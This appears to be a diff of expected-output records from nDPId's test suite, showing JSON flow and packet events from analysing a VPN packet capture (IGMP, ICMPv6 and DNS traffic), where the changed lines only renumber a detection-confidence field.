00537{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687241452,"flow_last_seen":1569687241452,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687241452,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 
00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1569687241452,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":56,"pkt_l4_len":8,"thread_ts_msec":1569687241452,"pkt":"AQBeAAABLH6BsEqhCABGwAAgGHkAAAECIZ0KAAAB4AAAAZQEAAARCu71AAAAAGluZyBzeXNjZmc="} -00596{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687241452,"flow_last_seen":1569687241452,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687241452,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"224.0.0.1","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00596{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687241452,"flow_last_seen":1569687241452,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687241452,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"224.0.0.1","l4_proto":2,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 
00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687241656,"flow_last_seen":1569687241656,"flow_idle_time":140000,"flow_min_l4_payload_len":120,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":120,"midstream":0,"thread_ts_msec":1569687241656,"l3_proto":"ip6","src_ip":"fe80::2e7e:81ff:feb0:4aa1","dst_ip":"ff02::1","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3} 00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1569687241656,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":174,"pkt_l4_len":120,"thread_ts_msec":1569687241656,"pkt":"MzMAAAABLH6BsEqhht1gAAAAAHg6\/\/6AAAAAAAAALn6B\/\/6wSqH\/AgAAAAAAAAAAAAAAAAABhgBH5kDAALQAAAAAAAAAABkFAAAAAVGAIAEFWP7tAAAAAAAAAAAAASABBVj+7QAAAAAAAAAAAAIDBEDAAAL9HQAC\/R0AAAAAJgEGRoQCRLAAAAAAAAAAABgDAAAAAAC0AAAAAAAAAAAAAAAAAAAAAAEBLH6BsEqh"} -00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687241656,"flow_last_seen":1569687241656,"flow_idle_time":140000,"flow_min_l4_payload_len":120,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":120,"midstream":0,"thread_ts_msec":1569687241656,"l3_proto":"ip6","src_ip":"fe80::2e7e:81ff:feb0:4aa1","dst_ip":"ff02::1","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 
+00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687241656,"flow_last_seen":1569687241656,"flow_idle_time":140000,"flow_min_l4_payload_len":120,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":120,"midstream":0,"thread_ts_msec":1569687241656,"l3_proto":"ip6","src_ip":"fe80::2e7e:81ff:feb0:4aa1","dst_ip":"ff02::1","l4_proto":"icmp6","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 00542{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687241657,"flow_last_seen":1569687241657,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687241657,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1569687241657,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":46,"pkt_l4_len":8,"thread_ts_msec":1569687241657,"pkt":"AQBeAAD7pHczjPFACABGwAAgAABAAAEC+IcKAACV4AAA+5QEAAAWAAkE4AAA+w=="} 
-00601{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687241657,"flow_last_seen":1569687241657,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687241657,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"224.0.0.251","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00601{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687241657,"flow_last_seen":1569687241657,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687241657,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"224.0.0.251","l4_proto":2,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1569687242068,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687242068,"pkt":"2DE0IHf7NDY7z3UoCABFAABAAABAAEAGJT8KAADjCgAAl95UH0ntZWziAAAAALAC\/\/8\/+wAAAgQFtAEDAwUBAQgKHA1tlQAAAAAEAgAA"} 
00543{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687242271,"flow_last_seen":1569687242271,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687242271,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"239.255.3.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1569687242271,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":46,"pkt_l4_len":8,"thread_ts_msec":1569687242271,"pkt":"AQBefwMWpHczjPFACABGwAAgAABAAAEC5m0KAACV7\/8DFpQEAAAWAPbp7\/8DFg=="} -00602{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687242271,"flow_last_seen":1569687242271,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687242271,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"239.255.3.22","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 
+00602{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687242271,"flow_last_seen":1569687242271,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687242271,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"239.255.3.22","l4_proto":2,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00546{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687242476,"flow_last_seen":1569687242476,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687242476,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"239.255.255.250","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1569687242476,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":46,"pkt_l4_len":8,"thread_ts_msec":1569687242476,"pkt":"AQBef\/\/6pHczjPFACABGwAAgAABAAAEC6YgKAACV7\/\/\/+pQEAAAWAPoE7\/\/\/+g=="} 
-00605{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687242476,"flow_last_seen":1569687242476,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687242476,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"239.255.255.250","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00605{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687242476,"flow_last_seen":1569687242476,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687242476,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"239.255.255.250","l4_proto":2,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1569687243071,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687243071,"pkt":"2DE0IHf7NDY7z3UoCABFAABAAABAAEAGJT8KAADjCgAAl95UH0ntZWziAAAAALAC\/\/88EwAAAgQFtAEDAwUBAQgKHA1xfQAAAAAEAgAA"} 
00625{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1569687244524,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":174,"pkt_l4_len":120,"thread_ts_msec":1569687244524,"pkt":"MzMAAAABLH6BsEqhht1gAAAAAHg6\/\/6AAAAAAAAALn6B\/\/6wSqH\/AgAAAAAAAAAAAAAAAAABhgBH5kDAALQAAAAAAAAAABkFAAAAAVGAIAEFWP7tAAAAAAAAAAAAASABBVj+7QAAAAAAAAAAAAIDBEDAAAL9HQAC\/R0AAAAAJgEGRoQCRLAAAAAAAAAAABgDAAAAAAC0AAAAAAAAAAAAAAAAAAAAAAEBLH6BsEqh"} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245251,"flow_last_seen":1569687245251,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1569687245251,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":52879,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1569687245251,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1569687245251,"pkt":"LH6BsEqhNDY7z3UoCABFAABE1h4AAP8RQxAKAADjS0tMTM6PADUAMDW7jEkBAAABAAAAAAAAA3ZjbwdwYW5kaW9uBnZpYXNhdANjb20AAAEAAQ=="} 
-00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245251,"flow_last_seen":1569687245251,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1569687245251,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":52879,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vco.pandion.viasat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245251,"flow_last_seen":1569687245251,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1569687245251,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":52879,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vco.pandion.viasat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1569687245288,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1569687245288,"pkt":"NDY7z3UoLH6BsEqhCABFAABUAABAADYRoh9LS0xMCgAA4wA1zo8AQIZKjEmBgAABAAEAAAAAA3ZjbwdwYW5kaW9uBnZpYXNhdANjb20AAAEAAcAMAAEAAQAAADwABAglZls="} -00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687245251,"flow_last_seen":1569687245288,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1569687245288,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":52879,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vco.pandion.viasat.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"8.37.102.91"}} +00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687245251,"flow_last_seen":1569687245288,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1569687245288,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":52879,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"vco.pandion.viasat.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"8.37.102.91"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245295,"flow_last_seen":1569687245295,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1569687245295,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":61387,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1569687245295,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1569687245295,"pkt":"LH6BsEqhNDY7z3UoCABFAABE77wAAEAR6XMKAADjS0tLS+\/LADUAMHT3LLcBAAABAAAAAAAAA3ZjbwdwYW5kaW9uBnZpYXNhdANjb20AABwAAQ=="} -00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245295,"flow_last_seen":1569687245295,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1569687245295,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":61387,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"vco.pandion.viasat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245295,"flow_last_seen":1569687245295,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1569687245295,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":61387,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vco.pandion.viasat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00607{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1569687245320,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":163,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":163,"pkt_l4_len":129,"thread_ts_msec":1569687245320,"pkt":"NDY7z3UoLH6BsEqhCABFAACVAABAADoRnt9LS0tLCgAA4wA178sAgY60LLeBgAABAAAAAQAAA3ZjbwdwYW5kaW9uBnZpYXNhdANjb20AABwAAcAYAAYAAQAAA4QARQZucy02MzIJYXdzZG5zLTE1A25ldAARYXdzZG5zLWhvc3RtYXN0ZXIGYW1hem9uwB8AAAABAAAcIAAAA4QAEnUAAAFRgA=="} 
-00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":20,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687245295,"flow_last_seen":1569687245320,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":121,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1569687245320,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":61387,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vco.pandion.viasat.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":20,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687245295,"flow_last_seen":1569687245320,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":121,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1569687245320,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":61387,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vco.pandion.viasat.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245321,"flow_last_seen":1569687245321,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1569687245321,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":62322,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1569687245321,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1569687245321,"pkt":"LH6BsEqhNDY7z3UoCABFAABEwHQAAEARF7sKAADjS0tMTPNyADUAMHBPLLcBAAABAAAAAAAAA3ZjbwdwYW5kaW9uBnZpYXNhdANjb20AABwAAQ=="} -00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245321,"flow_last_seen":1569687245321,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1569687245321,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":62322,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vco.pandion.viasat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245321,"flow_last_seen":1569687245321,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1569687245321,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":62322,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vco.pandion.viasat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00607{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1569687245366,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":163,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":163,"pkt_l4_len":129,"thread_ts_msec":1569687245366,"pkt":"NDY7z3UoLH6BsEqhCABFAACVAABAADYRod5LS0xMCgAA4wA183IAgYoMLLeBgAABAAAAAQAAA3ZjbwdwYW5kaW9uBnZpYXNhdANjb20AABwAAcAYAAYAAQAAA4QARQZucy02MzIJYXdzZG5zLTE1A25ldAARYXdzZG5zLWhvc3RtYXN0ZXIGYW1hem9uwB8AAAABAAAcIAAAA4QAEnUAAAFRgA=="} 